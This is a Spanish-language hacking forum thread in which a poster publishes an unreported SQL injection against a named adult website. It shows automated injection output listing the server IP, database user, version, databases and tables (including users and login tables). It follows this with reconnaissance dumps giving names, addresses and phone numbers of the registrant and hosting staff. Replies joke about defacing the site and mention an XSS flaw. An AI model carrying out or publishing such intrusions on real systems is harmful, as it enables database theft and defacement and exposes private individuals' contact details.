[SQL Injection] http://www.rubias19.com/

Asi, se jode a un Administrador De una Pagina Porno Basicamente. Vale aclarar, que el fallo no fue reportado.


Analyzing No tienes permitido ver los links. Registrarse o Entrar a mi cuenta with 1 input parameter(s)
Test parameter: id
Host IP: 109.205.138.21
Web Server: nginx
Powered-by: PHP/5.2.17
Keyword Found: NUEVA
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 5
Valid String Column is 2
Current DB: rubias19
Sql Version:    5.1.73-log
Current User:    rubias19@localhost
System User:    rubias19@localhost
Installation dir:    /usr/
Host Name:    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Current DB:    rubias19
Compile OS:    redhat-linux-gnu
Db user: 'rubias19'@'localhost'
Data Base Found: information_schema
Data Base Found: rubias19
Data Base Found: rubias19_clon
Data Base Found: tube_rubias19
Data Base Found: tube_rubias19_clon
Data Base Found: information_schema


Count(table_name) of information_schema.tables where table_schema=0x7275626961733139 is 24
Tables found: _ActricesVideos,
actrices,
contenidos_relacionados,
cumlouders_propios,
especiales,
fotospornogratis,
galerias_chicas,
galerias_propias,
ids_chicas,
ips,
noticiario_backup,
noticias,
noticias_backup,
palabras,
peliculas2,
rel_noticia_actriz,
rel_noticia_productora,
rel_noticia_tag,
tag,
tag_actriz,
tag_productora,
videos_embed,
videos_schat,
videospornogratis


Count(table_name) of information_schema.tables where table_schema=0x747562655F7275626961733139 is 8
Tables found: register_login,
tag,
tag_type,
tube_params,
users,
video,
video_images,
video_tag



=================================

IPv4




General information 109.205.138.21

IP address   109.205.138.21
Description   Hosting Rapido Madrid
Location   Spain (ES) flag
Internet Registry (RIR)   ripe

Network information
IP address   109.205.138.21
Reverse DNS (PTR record)   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
DNS server (NS record)   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (198.211.110.122)
ns2.hostingrapido.com (78.47.170.107)
ns3.hostingrapido.com (144.76.52.86)
ASN number   196929
ASN name (ISP)   OZONTI-NETWORK Somos Centro de Datos S.L.,ES
IP-range/subnet   109.205.138.0/24
109.205.138.0 - 109.205.138.255
Network tools   external website Ping 109.205.138.21
external website Traceroute 109.205.138.21

Hosting information
Number of domains hosted   6
Number of mail servers hosted   5
Number of name servers hosted   0

SPAM database lookup
db.wpbl.info   not listed good
dnsbl-1.uceprotect.net   not listed good
psbl.surriel.com   not listed good
recent.dnsbl.sorbs.net   not listed good
smtp.dnsbl.sorbs.net   not listed good
Number of SPAM hosts on 109.205.138.0/24   0
external website More DNSBL lookups

Blocklist lookup
Adult hosting   listed error
Dshield droplist   not listed good
Hackers, Spyware, Botnets etc.   not listed good
Open proxy   not listed good
Spamhaus droplist   not listed good

Domains on 109.205.138.21
rubias19.com analyse rubias19.comdomain info
ofertas.com analyse ofertas.comdomain info
conejox.com analyse conejox.comdomain info
conigliox.com analyse conigliox.comdomain info
taxi69.com analyse taxi69.comdomain info
premium-ns.com analyse premium-ns.comdomain info
domain neighbors 109.205.138.21Fresh lookup for more domains on this IP.

Domains around 109.205.138.21
IP address   Number of domains
109.205.137.203   16
109.205.137.204   2
109.205.137.205   6
109.205.137.206   1
109.205.137.210   6
109.205.137.211   1
109.205.137.213   21
109.205.137.214   65
109.205.137.215   28
109.205.137.216   2
109.205.137.217   1
109.205.137.219   54
109.205.137.220   26
109.205.137.226   23
109.205.137.228   82
external websiteSee more items

Mail servers on 109.205.138.21
rubias19.com   
conejox.com   
taxi69.com   
conigliox.com   
premium-ns.com   
Name servers on 109.205.138.21
No name servers found.   

Whois information
inetnum   109.205.138.0 - 109.205.138.255
netname   HostingRapido-Network
descr   Hosting Rapido Madrid
country   ES
admin-c   FJML11-RIPE
tech-c   FJML11-RIPE
status   ASSIGNED PA
mnt-by   MNT-GESTIONCLIENTES
mnt-lower   MNT-GESTIONCLIENTES
mnt-routes   MNT-GESTIONCLIENTES
source   RIPE # Filtered
person   Francisco Jose Mangas Lopez
address   Cl Jeronimo Arroyo, 13
phone   +34617056302
nic-hdl   FJML11-RIPE
source   RIPE # Filtered
route   109.205.138.0/24
descr   Hosting Rapido Network
origin   AS196929
mnt-by   MNT-GESTIONCLIENTES
source   RIPE # Filtered

Parant whois information
inetnum   109.205.136.0 - 109.205.143.255
netname   ES-GESTIONCLIENTES-20100212
descr   Somos Centro de Datos S.L.
country   ES
org   ORG-PAJL1-RIPE
admin-c   DPG4-RIPE
tech-c   DPG4-RIPE
status   ALLOCATED PA
mnt-by   RIPE-NCC-HM-MNT
mnt-lower   MNT-GESTIONCLIENTES
mnt-routes   MNT-GESTIONCLIENTES
source   RIPE # Filtered
organisation   ORG-PAJL1-RIPE
org-name   Somos Centro de Datos S.L.
org-type   LIR
address   Somos Centro de Datos S.L.
address   Daniel Perez
address   C/ Sevilla P16 i
address   34004
address   Palencia
address   SPAIN
phone   +34979726800
fax-no   +34979756800
abuse-c   AR14923-RIPE
mnt-ref   MNT-OZONTI
mnt-ref   RIPE-NCC-HM-MNT
mnt-by   RIPE-NCC-HM-MNT
admin-c   DPG4-RIPE
abuse-mailbox   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
source   RIPE # Filtered
person   Daniel Perez Gutierrez
address   Cl Sevilla 16i
phone   +34 979 727 624
nic-hdl   DPG4-RIPE
mnt-by   mnt-ozonti
source   RIPE # Filtered
route   109.205.137.0/24
descr   Customer Network
origin   AS196929
mnt-by   MNT-GESTIONCLIENTES
source   RIPE # Filtered

=================================

ISP

General information
AS number   196929
Alias   AS196929, ASN196929
Organization   OZONTI-NETWORK Somos Centro de Datos S.L.,ES
Country   Spain (ES) flag
Regional Internet Registry (RIR)   ripe
Allocation or assignment date   2010-02-12
Number of IPs originated (v4)   3,072
ASRank (based on number of IPs)   17,733
Number of active prefixes (ipv4)   6
Number of active prefixes (ipv6)   0
AS has bogon prefixes   No
Number of BGP peers detected (ipv4)   1
Number of BGP peers detected (ipv6)   0

Hosting information
Number of domains hosted   3,671
Number of adult domains hosted   40
Number of name servers hosted   216
Number of SPAM hosts hosted   10
Number of open proxies hosted   0
Number of malicious threats hosted   6
Number of mail servers hosted   154

Prefixes IPv4
Prefix   Description
109.205.136.0/24 (ES flag)   Cloud Network 1
109.205.137.0/24 (ES flag)   Somos Centro de Datos S.L.
109.205.138.0/24 (ES flag)   Hosting Rapido Madrid
109.205.139.0/24 (ES flag)   Somos Centro de Datos S.L.
109.205.140.0/22 (ES flag)   Cloud Network 2
185.25.196.0/22 (ES flag)   Somos Centro de Datos S.L.

Prefixes IPv6
No IPv6 prefixes defined. AS196929 is not IPv6 ready.   
Advertisements
HideMyAss.com

Domains hosted on as196929
Domain   IPv4 Address
grupocfi.es   109.205.136.11
aulateleformacion.com   109.205.136.11
lopdmanager.es   109.205.136.11
cursoslopd.es   109.205.136.11
juliocesar.biz   109.205.136.11
pcapunto.com   109.205.136.11
inoutconsulting.es   109.205.136.12
sercseurty.com   109.205.136.15
subserversecurty.com   109.205.136.15
sdfaildserver.com   109.205.136.15
puigpey.com   109.205.136.19
sallentassessors.com   109.205.136.19
autotradecenter.es   109.205.136.19
bcnfashionchannel.com   109.205.136.19
danielbartolome.com   109.205.136.19
external websiteSee more items

Top IPs with hosting
IP address   #domains   Example
109.205.137.75   345   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,santiagocatalan.com
109.205.140.116   327   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,gestioip.net
109.205.137.65   316   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,helicicultura.es
109.205.138.43   242   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,orthos.es
109.205.137.192   150   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,lolacasariego.com
109.205.137.179   125   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,expiracion.org
109.205.137.177   108   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,masseabogados.com
109.205.136.42   102   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,terranuestra.com
109.205.137.182   101   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,xabier.org
109.205.137.232   92   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,aluminioscampos.net
109.205.137.181   89   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,andreascalvo.com
109.205.138.19   88   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,webcond.com
109.205.137.135   85   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,tutallernatural.com
109.205.138.70   83   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,espalpsp.com
109.205.137.228   82   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,unikornio.net
external websiteSee more items

Mail servers hosted on as196929
Mail server   IPv4 Address   #domains
dedi.vacolba.es   109.205.136.30   3
iutomares.org   109.205.137.75   1
nomelades.com   109.205.136.149   1
tomaspuig.com   109.205.137.75   1
alcazaropticos.com   109.205.136.19   1
limpiezas-sanfroilan.com   109.205.137.75   1
mail.naeko.net   109.205.136.19   1
cadizdirecto.com   109.205.138.19   1
creacionestelar.com   109.205.136.19   1
espalwii.com   109.205.138.70   1
sonet.com.es   109.205.136.42   1
jcmari.com   109.205.138.50   1
cochesiniestrado.com   109.205.136.42   1
conigliox.com   109.205.138.21   1
andromines.net   109.205.137.181   1
external websiteSee more items

Name servers hosted on as196929
Name server   IPv4 Address   #domains
ns3.hostigal.com   109.205.137.192   608
ns4.hostigal.com   109.205.137.177   608
ns1.dominioanonimo.com   109.205.137.75   320
ns2.dominioanonimo.com   109.205.137.76   320
ns2.servidorneptuno.com   109.205.137.66   288
ns1.servidorneptuno.com   109.205.137.65   288
ns1.servidormercurio.com   109.205.140.116   140
ns2.servidormercurio.com   109.205.140.117   140
ns1.hostigal.com   109.205.137.232   115
ns2.hostigal.com   109.205.137.232   115
ns3.lugointernet.com   109.205.140.116   109
ns4.lugointernet.com   109.205.140.117   109
ns3.sonet.com.es   109.205.136.12   108
ns1.sonet.com.es   109.205.136.111   108
ns2.ahorrahosting.com   109.205.136.187   106
external websiteSee more items

Whois information
aut-num   AS196929
as-name   GESTIONCLIENTES-Network
org   ORG-PAJL1-RIPE
admin-c   DPG4-RIPE
tech-c   DPG4-RIPE
mnt-by   RIPE-NCC-END-MNT
mnt-by   MNT-GESTIONCLIENTES
mnt-routes   MNT-GESTIONCLIENTES
source   RIPE # Filtered
organisation   ORG-PAJL1-RIPE
org-name   PEREZ ARNAIZ JOSE LUIS 002479762A, SLNE
org-type   LIR
address   AlquiHosting, SL
phone   +34979105741
fax-no   +34979105741
admin-c   DPG4-RIPE
mnt-ref   MNT-GESTIONCLIENTES
mnt-by   RIPE-NCC-HM-MNT
source   RIPE # Filtered
person   Daniel Perez Gutierrez
address   Cl Miguel Hernandez 38
phone   +34 979 105 741
nic-hdl   DPG4-RIPE
mnt-by   mnt-gestionclientes
source   RIPE # Filtered
Country information (Spain)
Country   Spain
Capital   Madrid
Continent   EU
Population   46,505,963
Area   504,782 km²
Currency   EUR

=================================
Dominios

Domain name information
Domain name   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Domain suffix   com
Top-level domain (TLD)   com

Ranking
Current ranking Alexa   7,070
Highest ranking Alexa   2,683 (2013-07-07)
Current ranking Quantcast   not in top million
Highest ranking Quantcast   never ranked
Google PageRank   3

HTML information
HTML doctype   -//W3C//DTD XHTML 1.0 Transitional//EN
HTML charset   iso-8859-1
W3C warnings   275
W3C errors   1593
HTML tools   external website W3C Validator No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
external website Keyword Analysis No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WOT Reputation
Trustworthiness   Excellent (82)
Child safety   Very Poor (18)
Social media
Google +1 Button clicks   45
Facebook activity   Shares: 5685
Likes: 1648
Comments: 4665
Total: 11998
Number of tweets   44

Registrant:
Soluciones Telematicas MOL SL
c/petrarca 63 atico 1
Barcelona, Barcelona 08031
ES
+34.637512829
Domain Name: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Administrative Contact:
Ortiz Luque, Miguel No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
c/petrarca 63 atico 1
Barcelona, Barcelona 08031
ES
+34.637512829
Technical Contact:
Ortiz Luque, Miguel No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
c/petrarca 63 atico 1
Barcelona, Barcelona 08031
ES
+34.637512829
Record last updated 03-30-2011 04:21:46 PM
Record expires on 04-10-2014
Record created on 04-10-2001
Domain servers in listed order:
NS1.HOSTINGRAPIDO.COM   174.36.98.176
NS2.HOSTINGRAPIDO.COM   72.232.42.210
NS3.HOSTINGRAPIDO.COM   174.36.98.177

=================================

jajajaja buena la injección, esa vul es antigua (y)

Muy detallada la info

Deberias reportarle el fallo, de paso dile que tambien tiene XSS

Jjaja See es viejo el fallo ese, Igual Ya publicaré mas fallos, No estoy reportandolos ni nada, Solo los enseño...

De por sí no me interesa mucho la seguridad de una Página porno Jjaja

Peero bueno ya me voy a poner en contacto con los Administradores y Ver si me hacen caso.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Jjaja See es viejo el fallo ese, Igual Ya publicaré mas fallos, No estoy reportandolos ni nada, Solo los enseño...

De por sí no me interesa mucho la seguridad de una Página porno Jjaja

Peero bueno ya me voy a poner en contacto con los Administradores y Ver si me hacen caso.

Yo creo que ya son conscientes porque como dicen, esa vulnerabilidad tiene tiempo y fijo que alguien lo ha reportado, eso si, esa página tiene bastantes visitas, quien le haga un deface o ponga un link de su web, va a tener una subida de visitas bastante importante xD.

Aunque, no creo que dure mucho arriba, supongo que estarán atentos.

De todas formas, gran aporte, has puesto mucha información que es lo que me ha gustado.

Un saludo

muy bueno y detallado es felicidades  seguro no les es de importancia ademas los que ven porno tienen mala memoria ya seles olvido

A partir de ahora los de este foro nos dedicaremos a hackear paginas porno xD

Jajaja... excelente... che ANTRAX, agregarías a rubias19 como sponsor de UNderc0de? jaja

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Jjaja See es viejo el fallo ese, Igual Ya publicaré mas fallos, No estoy reportandolos ni nada, Solo los enseño...

De por sí no me interesa mucho la seguridad de una Página porno Jjaja

Peero bueno ya me voy a poner en contacto con los Administradores y Ver si me hacen caso.

Yo creo que ya son conscientes porque como dicen, esa vulnerabilidad tiene tiempo y fijo que alguien lo ha reportado, eso si, esa página tiene bastantes visitas, quien le haga un deface o ponga un link de su web, va a tener una subida de visitas bastante importante xD.

Aunque, no creo que dure mucho arriba, supongo que estarán atentos.

De todas formas, gran aporte, has puesto mucha información que es lo que me ha gustado.

Un saludo

si fueran tan concientes ya estaría arreglado, no cuesta nada.

saludos!